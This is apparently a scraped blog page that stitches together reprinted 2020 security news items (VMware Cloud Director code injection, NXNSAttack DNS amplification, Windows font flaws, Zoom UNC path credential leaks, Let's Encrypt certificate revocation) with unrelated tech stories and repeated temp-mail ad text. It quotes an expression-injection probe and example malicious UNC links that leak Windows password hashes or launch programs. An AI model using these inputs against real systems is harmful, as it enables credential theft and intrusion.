Critical VMware Cloud Director Flaw Lets Hackers Take Over Corporate Servers – Tempemail – Blog – 10 minute

Cybersecurity researchers today disclosed details for a new vulnerability in VMware’s Cloud Director platform that could potentially allow an attacker to gain access to sensitive information and control private clouds within an entire infrastructure.
Tracked as CVE-2020-3956, the code injection flaw stems from an improper input handling that could be abused by an authenticated attacker to send malicious traffic to Cloud Director, leading to the execution of arbitrary code.
It’s rated 8.8 out of 10 on the CVSS v.3 vulnerability severity scale, making it a critical vulnerability.

VMware Cloud Director is a popular deployment, automation, and management software that’s used to operate and manage cloud resources, allowing businesses to data centers distributed across different geographical locations into virtual data centers.
According to the company, the vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface, and API access.
The vulnerability impacts VMware Cloud Director versions 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4.
The vulnerability was identified by a Prague-based ethical hacking firm Citadelo after it was hired earlier this year by an unnamed Fortune 500 enterprise customer to carry out a security audit of its cloud infrastructure.

It has also published a proof-of-concept to demonstrate the exploit’s severity.
“Everything started with just a simple anomaly. When we entered ${7*7} as a hostname for the SMTP server in vCloud Director, we received the following error message: String value has an invalid format, value: [49],” Citadelo noted in its report. “It indicated some form of Expression Language injection, as we were able to evaluate simple arithmetic functions on the server-side.”
Using this as an entry point, the researchers said they were able to access arbitrary Java classes (e.g. “java.io.BufferedReader”) and instantiate them by passing malicious payloads.

Citadelo said it was able to perform the following the set of actions by exploiting the flaw:

View content of the internal system database, including password hashes of any customers allocated to this infrastructure.
Modify the system database to access foreign virtual machines (VM) assigned to different organizations within Cloud Director.
Escalate privileges from “Organization Administrator” to “System Administrator” with access to all cloud accounts by merely changing the password via an SQL query.
Modify the Cloud Director’s login page, allowing the attacker to capture passwords of another customer in plaintext, including System Administrator accounts.
Read other sensitive data related to customers, like full names, email addresses, or IP addresses.

After Citadelo privately disclosed the findings to VMware on April 1, the company patched the flaws in a series of updates spanning versions 9.1.0.4, 9.5.0.6, 9.7.0.5, and 10.0.0.2.
VMware has also released a workaround to mitigate the risk of attacks exploiting the issue.
“In general, cloud infrastructure is considered relatively safe because different security layers are being implemented within its core, such as encryption, isolating of network traffic, or customer segmentations. However, security vulnerabilities can be found in any type of application, including the Cloud providers themselves,” Tomas Zatko, CEO of Citadelo, said.

Tempemail , Tempmail Temp email addressess (10 minutes emails)– When you want to create account on some forum or social media, like Facebook, Reddit, Twitter, TikTok you have to enter information about your e-mail box to get an activation link. Unfortunately, after registration, this social media sends you dozens of messages with useless information, which you are not interested in. To avoid that, visit this Temp mail generator: tempemail.co and you will have a Temp mail disposable address and end up on a bunch of spam lists. This email will expire after 10 minute so you can call this Temp mail 10 minute email. Our service is free! Let’s enjoy!

New DNS Vulnerability Lets Attackers Launch Large-Scale DDoS Attacks – Tempemail – Blog – 10 minute

Israeli cybersecurity researchers have disclosed details about a new flaw impacting DNS protocol that can be exploited to launch amplified, large-scale distributed denial-of-service (DDoS) attacks to takedown targeted websites.
Called NXNSAttack, the flaw hinges on the DNS delegation mechanism to force DNS resolvers to generate more DNS queries to authoritative servers of attacker’s choice, potentially causing a botnet-scale disruption to online services.
“We show that the number of DNS messages exchanged in a typical resolution process might be much higher in practice than what is expected in theory, mainly due to a proactive resolution of name-servers’ IP addresses,” the researchers said in the paper.
“We show how this inefficiency becomes a bottleneck and might be used to mount a devastating attack against either or both, recursive resolvers and authoritative servers.”
Following responsible disclosure of NXNSAttack, several of the companies in charge of the internet infrastructure, including PowerDNS (CVE-2020-10995), CZ.NIC (CVE-2020-12667), Cloudflare, Google, Amazon, Microsoft, Oracle-owned Dyn, Verisign, and IBM Quad9, have patched their software to address the problem.

The DNS infrastructure has been previously at the receiving end of a rash of DDoS attacks through the infamous Mirai botnet, including those against Dyn DNS service in 2016, crippling some of the world’s biggest sites, including Twitter, Netflix, Amazon, and Spotify.

The NXNSAttack Method

A recursive DNS lookup happens when a DNS server communicates with multiple authoritative DNS servers in a hierarchical sequence to locate an IP address associated with a domain (e.g., www.google.com) and return it to the client.
This resolution typically starts with the DNS resolver controlled by your ISPs or public DNS servers, like Cloudflare (1.1.1.1) or Google (8.8.8.8), whichever is configured with your system.
The resolver passes the request to an authoritative DNS name server if it’s unable to locate the IP address for a given domain name.
But if the first authoritative DNS name server also doesn’t hold the desired records, it returns the delegation message with addresses to the next authoritative servers to which DNS resolver can query.

In other words, an authoritative server tells the recursive resolver: “I do not know the answer, go and query these and these name servers, e.g., ns1, ns2, etc., instead”.
This hierarchical process goes on until the DNS resolver reaches the correct authoritative server that provides the domain’s IP address, allowing the user to access the desired website.
Researchers found that these large undesired overheads can be exploited to trick recursive resolvers into forcefully continuously sending a large number of packets to a targeted domain instead of legitimate authoritative servers.
In order to mount the attack through a recursive resolver, the attacker must be in possession of an authoritative server, the researchers said.
“This can be easily achieved by buying a domain name. An adversary who acts as an authoritative server can craft any NS referral response as an answer to different DNS queries,” the researchers said.
The NXNSAttack works by sending a request for an attacker-controlled domain (e.g., “attacker.com”) to a vulnerable DNS resolving server, which would forward the DNS query to the attacker-controlled authoritative server.
Instead of returning addresses to the actual authoritative servers, the attacker-controlled authoritative server responds to the DNS query with a list of fake server names or subdomains controlled by the threat actor that points to a victim DNS domain.

The DNS server, then, forwards the query to all the nonexistent subdomains, creating a massive surge in traffic to the victim site.
The researchers said the attack can amplify the number of packets exchanged by the recursive resolver by as much as a factor of more than 1,620, thereby overwhelming not only the DNS resolvers with more requests they can handle, but also flood the target domain with superfluous requests and take it down.

What’s more, using a botnet such as the Mirai as a DNS client can further augment the scale of the attack.
“Controlling and acquiring a huge number of clients and a large number of authoritative NSs by an attacker is easy and cheap in practice,” the researchers said.
“Our initial goal was to investigate the efficiency of recursive resolvers and their behavior under different attacks, and we ended up finding a new seriously looking vulnerability, the NXNSAttack,” the researchers concluded.
“The key ingredients of the new attack are (i) the ease with which one can own or control an authoritative name server, and (ii) the usage of nonexistent domain names for name servers and (iii) the extra redundancy placed in the DNS structure to achieve fault tolerance and fast response time,” they added.
It’s highly recommended that network administrators who run their own DNS servers update their DNS resolver software to the latest version.

Tempemail , Tempmail Temp email addressess (10 minutes emails)– When you want to create account on some forum or social media, like Facebook, Reddit, Twitter, TikTok you have to enter information about your e-mail box to get an activation link. Unfortunately, after registration, this social media sends you dozens of messages with useless information, which you are not interested in. To avoid that, visit this Temp mail generator: tempemail.co and you will have a Temp mail disposable address and end up on a bunch of spam lists. This email will expire after 10 minute so you can call this Temp mail 10 minute email. Our service is free! Let’s enjoy!

Windows 10 Flaw Lets Hackers Create Booby-Trapped Documents on Your PC | Tempemail – Blog – 10 minute

Sourced from Tech Advisor

Hackers are now exploiting a pair of previously unknown vulnerabilities in Microsoft Windows, that can be used to create and plant documents booby-trapped with malware, to help them take over your computer, reports PC Mag.
On Monday Microsoft said via a security advisory that it is “aware of limited targeted attacks” abusing two flaws – that as of now remain unpatched and still viable. The flaws are included in operating systems from Windows 10 to Windows 8.1 and Windows 7, along with various other Windows Server versions. All are affected.
Microsoft is of yet refraining to disclose any details about the attacks, and just how prolific they have been.

In the advisory, Microsoft says that “There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.”

Microsoft is aware of limited targeted attacks that could leverage unpatched vulnerabilities in the Adobe Type Manager Library, and is providing guidance to help reduce customer risk until the security update is released. See the link for more details. https://t.co/tUNjkHNZ0N
— Security Response (@msftsecresponse) March 23, 2020

 
The two system vulnerabilities are with the Windows Adobe Type Manager Library, which is used to parse and properly display Adobe-based fonts on a PC. Microsoft says that the library will mishandle a specially crafted multi-master font known as Adobe Typ 1 PostScript format. The error following this mishandling can cause what is known as a code execution, which a hacker can abuse to manipulate a PC to download and install additional malware.
Microsoft’s patch probably won’t arrive until about 14 April. The company has come up with a few temporary solutions to mitigate attacks in the meantime. These include:

Disabling the Preview Pane and Details Pane in Windows Explorer
Renaming the Adobe Type Manager Font Driver file “ATMFD.dll.”

With more people than ever working from their home computers during the coronavirus lockdown, these flaws couldn’t have been discovered at a worse time. Cybercriminals continue to prey on users when they are at the most vulnerable.
Microsoft’s History of Windows Flaws
Microsoft’s Windows OS is currently the most used operating system on Earth for desktop and laptop computers, and that means their OS is open to far more people tearing through to isolate flaws in the code.
Recently, Windows 10 has been singled out for the many flaws that have plagued the system. Its most recent – system crashes that completely delete user data.
Edited by Luis Monzon
Follow Luis Monzon on Twitter
Follow Tempemail on Twitter

Tempemail , Tempmail Temp email addressess (10 minutes emails)– When you want to create account on some forum or social media, like Facebook, Reddit, Twitter, TikTok you have to enter information about your e-mail box to get an activation link. Unfortunately, after registration, this social media sends you dozens of messages with useless information, which you are not interested in. To avoid that, visit this Temp mail generator: tempemail.co and you will have a Temp mail disposable address and end up on a bunch of spam lists. This email will expire after 10 minute so you can call this Temp mail 10 minute email. Our service is free! Let’s enjoy!

Unpatched Zoom App Bug Lets Hackers Steal Your Windows Password – Tempemail – Blog – 10 minute

Zoom has been there for nine years, but the immediate requirement of an easy-to-use video conferencing app during the coronavirus pandemic made it overnight a favorite tool for millions of people.
Though Zoom is an efficient online video meeting solution, it’s still not the best choice in terms of privacy and security.
According to the latest finding by cybersecurity expert @_g0dmode and confirmed by researcher Matthew Hickey, the Zoom client for Windows is vulnerable to the ‘UNC path injection‘ vulnerability that could let remote attackers steal login credentials for victims’ Windows systems.

The attack involves the SMBRelay technique wherein Windows automatically expose a user’s login username and NTLM password hashes to a remote SMB server when attempting to connect and download a file hosted on it.

The attack is possible only because Zoom for Windows supports remote UNC paths, which converts such potentially insecure URLs into hyperlinks for recipients in a personal or group chats.
To steal the login credential of a zoom with Windows client, all an attacker needs to do is sent a crafted URL (i.e. x.x.x.xabc_file) to the victim over the chat interface, as shown, and wait for the victim to click it once, that’s it.
Easy, isn’t it, to convince people clicking a random link over chat?

To be noted, the captured passwords are not a plaintext, but a weak one can be cracked easily in seconds using password cracking tools like HashCat or John the Ripper.
In a shared environment, like office space, stolen login details can be reused immediately to compromise other users or IT resources, and launch further attacks.

Zoom has already been notified of this bug, but since the flaw has not yet been patched, users are advised to either use an alternative video conferencing software or use Zoom in your web browser instead of the dedicated client app.
Besides always using a secure password, Windows users can also change the security policy settings to restrict the operating system from automatically passing your NTML credentials to a remote server.
As we mentioned earlier, this is not the only privacy or security issue that has been uncovered in Zoom over the past couple of days.
Just yesterday, a report confirmed that Zoom doesn’t use end-to-end encryption to protect calling data of its users from prying eyes despite telling users that “Zoom is using an end to end encrypted connection.”

Tempemail , Tempmail Temp email addressess (10 minutes emails)– When you want to create account on some forum or social media, like Facebook, Reddit, Twitter, TikTok you have to enter information about your e-mail box to get an activation link. Unfortunately, after registration, this social media sends you dozens of messages with useless information, which you are not interested in. To avoid that, visit this Temp mail generator: tempemail.co and you will have a Temp mail disposable address and end up on a bunch of spam lists. This email will expire after 10 minute so you can call this Temp mail 10 minute email. Our service is free! Let’s enjoy!

Windows flaw lets Zoom leak network credentials, runs code remotely – Security- Tempemail – Blog – 10 minute

Popular video conferencing service Zoom has a high risk security issue in its Windows client that can be used for limited remote code execution and, worse, to capture and replay security tokens to access network resources, security researchers have found.
Matthew Hickey of cybersecurity firm Hacker House that specialises in penetration testing and vulnerability analysis, told iTnews that the Zoom Windows desktop client is vulnerable to a high risk Universal Naming Convention (UNC) injection flaw in how the app handles Uniform Resource Identifier paths.
“An attacker can inject a link such as attacker.computer.comcompany_salary.xlsx into the chat, should anyone click on the link it will expose their Windows username, domain name -or- computer name and a hashed version of their Windows password,” Hickey said..
“An attacker can replay those hashed password values and access services such as Microsoft Exchange, Outlook Webmail and Sharepoint,” he added.
Hickey tested a discovery from another researcher who goes by the _g0dmode moniker, and who noted it was possible to capture Windows network NT Lan Manager (NTLM) hashes using the flaw.
Expanding on the prior discovery of the vulnerability, Hickey told iTnews that it is possible to run commands and install malware on clients.
If an attacker tries to do that, newer versions of Windows will warn users that a remote code execution attack could be taking place.
For example, it is possible to trigger the classic Windows remote code execution proof of running the built in calculator app by sending a link like: 127.0.0.1C$WindowsSystem32Calc.exe
Alert dialogs are only displayed for executable files and commands however.
“If an attacker attempts to leak credentials, no such warning is displayed,” Hickey said.
Hickey demonstrated the credentials capture to iTnews.
The flaw affects Zoom’s Windows client only, Hickey said. On Apple’s macOS, the Zoom client doesn’t make the links clickable.
Despite the warnings when attackers attempt to run code remotely, Hickey said the flaw should be rated as a serious one.
“I would usually score this as a medium risk issue, however in light of the fact that the issue is easily exploited through “ZoomBombing” (guessing the meeting ID’s through brute-force) and more susceptible to exploitation in the working from home climate, I would advise that it is a high risk issue,” he said.
Hickey has reported the issue to Zoom via Twitter.
As its popularity has climbed with people and students working from home in coronavirus lockdowns, the security of Zoom has come under intense scrutiny.
Other researchers have found that Zoom’s Company Directory feature leaks email addresses and photos, and that the video conferencing app does not use end-to-end encryption to protect calls from interception.
The United States Federal Bureau of Investigation’s Boston office also issued an alert over the rash of ZoomBombing attacks, in which uninvited people hijack video conferences, in some cases exposing themselves and/or posting obscene material.
iTnews has sought comment from Zoom on the vulnerability and will update the story when it arrives.

Tempemail , Tempmail Temp email addressess (10 minutes emails)– When you want to create account on some forum or social media, like Facebook, Reddit, Twitter, TikTok you have to enter information about your e-mail box to get an activation link. Unfortunately, after registration, this social media sends you dozens of messages with useless information, which you are not interested in. To avoid that, visit this Temp mail generator: tempemail.co and you will have a Temp mail disposable address and end up on a bunch of spam lists. This email will expire after 10 minute so you can call this Temp mail 10 minute email. Our service is free! Let’s enjoy!

Plague Inc.’s new mode lets players save the world from a pandemic instead of destroying it – Blog – 10 minute

In a nutshell: Plague Inc., the strategy game that tasks players with creating a disease for wiping out humanity, might feel a little too close to reality right now, but it’s getting a new mode that’s a lot more optimistic: save the world from an outbreak instead of destroying it.
Plague Inc.’s developer, Ndemic Creations, recently donated $250,000 to help in the battle against the coronavirus. The money was split between the Coalition of Epidemic Preparedness Innovations (CEPI) and the World Health Organization’s Covid-19 Solidarity Response Fund.
Plague Inc.’s creator, James Vaughan, said that when the game was released eight years ago, he “never imagined the world would come to resemble a game of Plague Inc. or that so many players would be using Plague Inc. to get them through an actual pandemic.”
“We are proud to be able to help support the vital work of the WHO and CEPI as they work towards finding a vaccine for Covid-19.”

When arranging the donation with the WHO and CEPI, the studio was repeatedly asked if it could add a new game mode in which players worked to stop a deadly disease outbreak. The company is now accelerating work on this new game mode, which involves managing disease progression, boosting healthcare systems, and “controlling real-world actions such as triaging, quarantining, social distancing and closing of public services.”
Ndemic Creations says the update, which is being developed “with the help of experts from the WHO, CEPI, and more,” will be free for all players during the pandemic, and that it will release more information as soon as possible. The company will also be promoting the WHO’s Covid-19 response fund within the game for anyone wishing to donate.
Back in January when the coronavirus was mostly located within China, Plague Inc. experienced a surge in popularity, resulting in the devs reminding people that “it’s a game, not a scientific model.”

Related Reads

10 minutes mail – Also known by names like : 10minemail, 10minutemail, 10mins email, mail 10 minutes, 10 minute e-mail, 10min mail, 10minute email or 10 minute temporary email. 10 minute email address is a disposable temporary email that self-destructed after a 10 minutes.Tempemail.co – is most advanced throwaway email service that helps you avoid spam and stay safe. Try tempemail and you can view content, post comments or download something anonymously on Internet.

Tempemail , Tempmail Temp email addressess (10 minutes emails)– When you want to create account on some forum or social media, like Facebook, Reddit, Twitter, TikTok you have to enter information about your e-mail box to get an activation link. Unfortunately, after registration, this social media sends you dozens of messages with useless information, which you are not interested in. To avoid that, visit this Temp mail generator: tempemail.co and you will have a Temp mail disposable address and end up on a bunch of spam lists. This email will expire after 10 minute so you can call this Temp mail 10 minute email. Our service is free! Let’s enjoy!

DoNotPay’s extension lets you share streaming services without revealing your password – Blog – 10 minute

In a nutshell: Sharing online account passwords with friends and family is something many people do, but not everyone is comfortable with revealing their credentials. Now, a new Chrome extension will allow you to share access to Netflix, Spotify, Disney+, etc. without divulging login details.
The extension comes from DoNotPay, which was behind the AI-powered “robot lawyer” app that helps users contest parking tickets. It can also help refugees apply for asylum protection, aid consumers in suing robocallers, and even ‘sue anyone’ by “pressing a button.”
Once you install the DoNotPay Chrome extension, head to a website you’d like to share with someone. It’s then a matter of hitting the DoNotPay icon at the top of the browser and selecting Generate Link, which creates a shareable link that can be sent or emailed. If you’re not into sharing passwords freely, an exchange feature lets you trade subscriptions, so you can swap access to an account, say Netflix, for access to someone’s Disney+ account.

Recipients of the links need to have the DoNotPay extension installed and will be logged into a sender’s account automatically after verifying their identity. As it works by transferring the cookie of a logged-in session, nobody will see your password. The company says (via VentureBeat) it does not store the cookies or have access to them, and that they are encrypted in transit.
While people you share accounts with will be able to make minor changes, such as adding titles to watch lists, they won’t be able to change passwords or two-factor authentication details.
DoNotPay creator Joshua Browder said there’s no limit on the number of people you can share an account with, though many services do restrict how many devices can stream their content simultaneously.
Most online subscription services’ policies restrict the sharing of usernames and passwords, and while DoNotPay isn’t technically giving away these details, the companies are unlikely to see it that way.

Related Reads

10 minutes mail – Also known by names like : 10minemail, 10minutemail, 10mins email, mail 10 minutes, 10 minute e-mail, 10min mail, 10minute email or 10 minute temporary email. 10 minute email address is a disposable temporary email that self-destructed after a 10 minutes.Tempemail.co – is most advanced throwaway email service that helps you avoid spam and stay safe. Try tempemail and you can view content, post comments or download something anonymously on Internet.

Tempemail , Tempmail Temp email addressess (10 minutes emails)– When you want to create account on some forum or social media, like Facebook, Reddit, Twitter, TikTok you have to enter information about your e-mail box to get an activation link. Unfortunately, after registration, this social media sends you dozens of messages with useless information, which you are not interested in. To avoid that, visit this Temp mail generator: tempemail.co and you will have a Temp mail disposable address and end up on a bunch of spam lists. This email will expire after 10 minute so you can call this Temp mail 10 minute email. Our service is free! Let’s enjoy!

Jailbreak lets users run Android on iPhones – Security – Telco/ISP- Tempemail – Blog – 10 minute

Mobile virtualisation company Corellium has released a version of Android that runs on certain iPhones, by using a so-called jailbreak, a vulnerability that bypasses Apple’s strict software and security restrictions on devices.
Known as Project Sandcastle, Corellium’s Android version is released as beta software that has only received limited testing, and users are warned to be cautious when installing it.
The jailbreak that Sandcastle is based on is the Checkra1n exploit that was discovered in September last year and the PongoKit software development kit and PongoOS operating system.
By using Checkra1n, it is possible to bypass Apple’s boot read-only memory protections run a copy of Google’s Android mobile operating system in memory on iPhones.
Sandcastle does not persist on the device, and users can return to iOS by rebooting their iPhones.
Presently, only iPhone 7 and 7+ that appeared in 2016 are supported by Sandcastle, along with iPod 7G.
Sandcastle can’t make use of the graphics processor on iPhone 7s, or the audio circuitry and camera.
Nor do cellular and Bluetooth connections work yet, but WiFi runs, making it possible to over-the-top apps such as Signal for calls and messaging.
A Linux build of Sandcastle is also available, and Corellium has released the source code for the software on Github.
Corellium’s work on iPhone virtualisation has been noticed by Apple, which has taken the company to court, alleging that developing software that can be used to jailbreak devices violates the trafficking provisions in the United States Digital Millennium Copyright Act (DMCA).

Tempemail , Tempmail Temp email addressess (10 minutes emails)– When you want to create account on some forum or social media, like Facebook, Reddit, Twitter, TikTok you have to enter information about your e-mail box to get an activation link. Unfortunately, after registration, this social media sends you dozens of messages with useless information, which you are not interested in. To avoid that, visit this Temp mail generator: tempemail.co and you will have a Temp mail disposable address and end up on a bunch of spam lists. This email will expire after 10 minute so you can call this Temp mail 10 minute email. Our service is free! Let’s enjoy!

Let’s Encrypt Revoking 3 Million TLS Certificates Issued Incorrectly Due to a Bug – Tempemail – Blog – 10 minute

The most popular free certificate signing authority Let’s Encrypt is going to revoke more than 3 million TLS certificates within the next 24 hours that may have been issued wrongfully due to a bug in its Certificate Authority software.
The bug, which Let’s Encrypt confirmed on February 29 and was fixed two hours after discovery, impacted the way it checked the domain name ownership before issuing new TLS certificates.
As a result, the bug opened up a scenario where a certificate could be issued even without adequately validating the holder’s control of a domain name.
The Certification Authority Authorization (CAA), an internet security policy, allows domain name holders to indicate to certificate authorities (CAs) whether or not they are authorized to issue digital certificates for a specific domain name.

Let’s Encrypt considers domain validation results good only for 30 days from the time of validation, after which it rechecks the CAA record authorizing that domain before issuing the certificate. The bug — which was uncovered in the code for Boulder, the certificate signing software used by Let’s Encrypt — is as follows:

“When a certificate request contained N domain names that needed CAA rechecking, Boulder would pick one domain name and check it N times.” In other words, when Boulder needed to parse, for example, a group of 5 domains names that required CAA rechecking, it would check one domain name 5 times as opposed to checking each of the 5 domains once.

The company said the bug was introduced as part of an update back in July 2019.
This means that Let’s Encrypt might have issued certificates that it shouldn’t have in the first place, as a result of which it’s revoking all the TLS certificates that were affected by the bug.
The development comes as Let’s Encrypt project announced last week that it had issued its one-billionth free TLS certificate since its launch in 2015.

Let’s Encrypt said 2.6 percent of approximately 116 million active certificates are affected — about 3,048,289 — out of which about one million are duplicates of other affected certificates.
Affected website owners have until 8PM UTC (3PM EST) March 4 to manually renew and replace their certificates, failing which visitors to the websites will be greeted with TLS security warnings — as the certificates are revoked — until the renewal process is complete.
It’s worth noting that the certificates issued by Let’s Encrypt are valid for a period of 90 days, and ACME clients such as Certbot are capable of automatically renewing them.
But with Let’s Encrypt revoking all impacted certificates, website admins will have to perform a forced renewal to prevent any interruptions.
Besides using the tool https://checkhost.unboundtest.com/ to check if a certificate needs replacement, Let’s Encrypt has put together a downloadable list of affected serial numbers, allowing subscribers to check if their websites rely on an affected certificate.

Tempemail , Tempmail Temp email addressess (10 minutes emails)– When you want to create account on some forum or social media, like Facebook, Reddit, Twitter, TikTok you have to enter information about your e-mail box to get an activation link. Unfortunately, after registration, this social media sends you dozens of messages with useless information, which you are not interested in. To avoid that, visit this Temp mail generator: tempemail.co and you will have a Temp mail disposable address and end up on a bunch of spam lists. This email will expire after 10 minute so you can call this Temp mail 10 minute email. Our service is free! Let’s enjoy!

Let’s Encrypt Issued A Billion Free SSL Certificates in the Last 4 Years – Tempemail – Blog – 10 minute

Let’s Encrypt, a free, automated, and open certificate signing authority (CA) from the nonprofit Internet Security Research Group (ISRG), has said it’s issued a billion certificates since its launch in 2015.
The CA issued its first certificate in September 2015, before eventually reaching 100 million in June 2017. Since late last year, Let’s Encrypt has issued at least 1.2 million certificates each day.
The development comes as over 80 percent of the web page loads have begun using HTTPS worldwide, and 91 percent in the US alone.
HTTPS, the default means of secure communication on the internet, comes with three benefits: authentication, integrity, and encryption. It allows HTTP requests to be transmitted over a secure encrypted channel, thus protecting users from an array of malicious activities, including site forgery and content manipulation.

“Since 2017, browsers have started requiring HTTPS for more features, and they’ve greatly improved the ways in which they communicate to their users about the risks of not using HTTPS,” the company said. “When websites put their users at risk by not using HTTPS, major browsers now show stronger warnings. Many sites have responded by deploying HTTPS.”
Launched with the goal of speeding up the web’s encryption rate and bringing down the costs of enabling HTTPS, Let’s Encrypt’s ACME (Automatic Certificate Management Environment) protocol offers an easy means to set up and issue SSL certificates that can be renewed and replaced without manual intervention from webmasters.
Electronic Frontier Foundation’s Certbot is one such popular open-source, free-to-use ACME client that enables HTTPS on websites by automatically deploying Let’s Encrypt certificates — which are valid only for 90 days — and managing renewals.
But with bad actors abusing Let’s Encrypt HTTPS certificates to mask malicious traffic and direct unsuspecting users to malicious sites, the company has taken steps to “ensure that a certificate applicant actually controls the domain they want a certificate for.”

Apple Takes a Significant Step Forward

But that’s not all. Apple has managed to do what most CAs were hesitant to accomplish all this time: shorten the maximum validity of issued certificates to one year.
The tech giant recently announced that starting 1st September 2020, Safari will reject new HTTPS certificates that expire more than 13 months (or 398 days) from their creation date, effectively bringing down the maximum certificate lifetime from 825 days.

This follows a failed ballot held last September by CA/Browser Forum to reduce certificate lifetimes. Although Let’s Encrypt, certSIGN, Apple, Cisco, Google, Microsoft, Mozilla, and Opera voted in favor of the move, close to two-thirds of participating CAs rejected the idea.
Apple’s move to shorten the lifespan of HTTPS certificates means that CA’s like Let’s Encrypt and ACME clients such as Certbot will only become more valuable going forward, as it would force the website administrators to use a certificate issued for 1 year or less.

How Do Short-Lived Certificates Increase Security?

Capping certificate lifetimes improves website security, not least because it reduces the possibility of criminals stealing neglected certificates to mount phishing and malware attacks.
Secondly, mobile versions of Chrome and Firefox do not proactively check for certificate status, implying a website whose certificate has been revoked will still continue to load without giving any warning to the user.
This is for performance reasons as browsers will have to end up downloading certificate revocation lists (CRLs) that can be quite large in size, affecting page loads.
Instead, Chrome uses CRLSets to “block certificates in emergency situations,” while Mozilla has been experimenting with CRLite in its nightly builds.
Aside from these techniques, the Firefox maker has also announced technical specifications for a new cryptographic protocol called “Delegated Credentials for TLS,” which “allows companies to take partial control over the process of signing new certificates for themselves—with a validity period of no longer than 7 days and without entirely relying on the certificate authority.”
It goes without saying that Apple’s decision to cut certificate lifetimes is a significant step forward for security. And if it helps proactively prevent users from connecting to compromised websites, it can only be a good thing.

Tempemail , Tempmail Temp email addressess (10 minutes emails)– When you want to create account on some forum or social media, like Facebook, Reddit, Twitter, TikTok you have to enter information about your e-mail box to get an activation link. Unfortunately, after registration, this social media sends you dozens of messages with useless information, which you are not interested in. To avoid that, visit this Temp mail generator: tempemail.co and you will have a Temp mail disposable address and end up on a bunch of spam lists. This email will expire after 10 minute so you can call this Temp mail 10 minute email. Our service is free! Let’s enjoy!